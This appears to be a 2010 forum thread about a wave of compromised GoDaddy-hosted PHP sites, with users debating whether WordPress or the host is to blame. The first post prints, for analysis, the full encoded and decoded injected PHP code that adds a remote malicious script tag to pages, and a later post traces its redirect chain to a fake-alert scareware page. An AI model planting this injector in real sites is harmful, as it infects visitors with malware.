72 replies to this topic

[TonyLock]

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/G...tus/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

When you decode this, it equates to:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
	if(!function_exists('mrobh')){
		if(!function_exists('gml')){
			function gml(){
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
				}
				return "";
			}
		}
        if(!function_exists('gzdecode')){
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
      				$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
       				$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
       				$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
       			}
    			if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
      				$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
				if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
					$RBE4C4D037E939226F65812885A53DAD9+=2;
      			}
      			$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
      			if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
      				$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      			}
      			return $R034AE2AB94F99CC81B389A1822DA3353;
     		}
		}
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			}else{
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}
		ob_start('mrobh');
	}
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

[+Cupcakes]

Hosting companies always love to jump on the Wordpress bandwagon as the reason for any security vulnerbilities.

http://wordpress.org...le-permissions/

[TonyLock]

I know! My friend doesn't even use WordPress.

[HawkMan]

God Hacking

that's some serious business

[itzwolf]

Dang, first I've heard of this...

[+Cupcakes]

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

Again, GODADDY is the one that's at fault NOT WORDPRESS. Yes, outdated Wordpress installs can reek havoc but if you read the above link in my other post, it's going to revolve around the SERVERS LACK OF SECURITY.

[hotdog963al]

Cupcakes, on 02 May 2010 - 23:59, said:

Yay I love that someone was so quick to jump on the bandwagon: http://www.neowin.ne...daddycom-hacked

That's extremely annoying to see on the front page.

[TonyLock]

This absolutely needs to be in th front page. However, it should be stated that it absolutely was not the fault of WordPress as claimed by GoDaddy.
No software should be blamed for the incompetency of a hosting company.
It was not a weak password issue, or a FTP key logger as GoDaddy just told my friend.
It was GoDaddy's lack of adequate security.
Perhaps GoDaddy has some legal issues here and so not to get their butts sued, they blame some software that's not even on their servers.

[Andrew Lyle]

hotdog963al, on 03 May 2010 - 00:30, said:

That's extremely annoying to see on the front page.

You have to read:
www.twitter.com/GoDaddy and read all the complaints
and
http://community.god...it/?isc=smtwsup

GoDaddy understands its usually WordPress or weak FTP passwords.. With the amount of reports, this appears to be WordPress on GoDaddy servers.

[Singh400]

Any coding gods tell us what the quoted codes do? Out of sheer interest...

[Andrew Lyle]

Here is another report:
http://wordpress.org...rt/topic/394255

Just google:

Quote

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

I have to be clear, nobody knows 100% what the cause is, but WordPress owners appear to be getting hacked, aside from the odd post here on Neowin, claiming that friends got hacked, without wordpress installed.

But we can all safely say that GoDaddy is the host of all these compromised websites, correct?

[+Cupcakes]

A server-wide occurrence is the fault of GoDaddy and not Wordpress (as expressed by seeing this issue with non-Wordpress accounts on effect GoDaddy servers.) Not only that but people also fail to understand to bring up any Wordpress plugins that they're using. Those can be the culprit and not even Wordpress itself.

Andrew, even in the Wordpress support link, you can also see that another user chimes in that it's not Wordpress-specific: http://blog.sucuri.n...tes-hacked.html

Quote

Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.

WordPress, like all other web applications, must store database connection info in clear text. Encrypting credentials doesn’t matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

I’m not even going to link any of the articles because they have so many inaccuracies you become stupider by reading them.

If you’re a web host and you turn a bad file permissions story into a WordPress story, you’re doing something wrong.

P.S. Network Solutions, it’s “WordPress” not “Word Press.”

[RoomKid]

I've been hacked once too, there was this file encoded in Base64. To access the file, you need a password. So I opened that file in cPanel, and found out the password. When I got access, I was amazed. It was like a filemanager, I can edit/delete/create new files. There were hacking tools too. I deleted it, changed my passwords and everything else to make sure that I was safe.

[bytes2000]

TonyLock, on 02 May 2010 - 22:02, said:

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

I have further checked the script via: http://web-sniffer.net/ and if you are not the Google Bot or YahooBot...
it redirects to: http://www4.suitcase...GibZZqXlw%3D%3D
It creates 7 cookies:

Quote

HTTP Response Header
Name Value Delim
Status: HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Mon, 03 May 2010 02:58:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.12
Set-Cookie: cid=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: uid=2045; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: bid=b_Unknown; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls=107; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid=3; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: pid_3=1; expires=Tue, 04-May-2010 02:58:33 GMT
Set-Cookie: ls_3_107=1; expires=Tue, 04-May-2010 02:58:33 GMT

And then redirects you to:
and then it redirects you via HTTP 302 code to: http://www1.safetypc...3qqh9qilnFxbXA=

and then it finnally redirects you to a page with the following content:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta http-equiv="Content-Language" content="en"/><meta http-equiv="Cache-control" content="Public"/><title>Security Threat Analysis</title><link rel="icon" href="http://www.google.com/favicon.ico"/><link rel="SHORTCUT ICON" href="http://www.google.com/favicon.ico"/>
  
  
  <style type="text/css" media="screen">
    #loading {
      height:auto;
      left:45%;
      padding:2px;
      position:absolute;
      top:40%;
      z-index:20001;
    }
    #loading a {
      color:#225588;
    }
    #loading .loading-indicator {
      -x-system-font:none;
      background:white none repeat scroll 0 0;
      color:#444444;
      font-family:tahoma,arial,helvetica;
      font-size:13px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:bold;
      height:auto;
      line-height:normal;
      margin:0;
      padding:10px;
    }
    #loading-msg {
      -x-system-font:none;
      font-family:arial,tahoma,sans-serif;
      font-size:10px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:normal;
      line-height:normal;
    }
  </style></head><body>
  <div id="loading" style="display:block"><div class="loading-indicator"><img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="Images/loading.gif"/><br/><span id="loading-msg">Initializing process.</span></div></div>
<script type="text/javascript" src="107a447c72270a52ae79e796c983523e3a563008911.js"></script>
</body></html>

Good! my Symantec Endpoint antivirus blocked something and I cannot access: www1.safetypcwork5.net so I will continue investigating via web-sniffer

That page, shows a loading image and loads the following javascript code: http://www1.safetypc...e3a563008911.js

I did not post the whole code since it would detect a virus in this thread

basically it opens a fake system alerts like the following:

Quote

["To prevent damage to your computer, use CANCEL.","C"],["Your system is at risk of crash. Press CANCEL to prevent it.","C"],["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.","O"],["To improve performance of your PC press 'OK'.","O"],["Your PC is working slowly. Press 'OK' to check it.","O"]

I did not further check the complex javascript of this, but it is 1000% Malware... and I think this was caused by a Worm or maybe a virus exploting unpatched WP installs and not really brute forcing for weak passwords, because I think brute forcing is used mainly when they set your site as the target but we cannot tell if that worm affected the WP install, so its better to reinstall and continue using (if not already) safe passwords.

[GoDaddy]

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem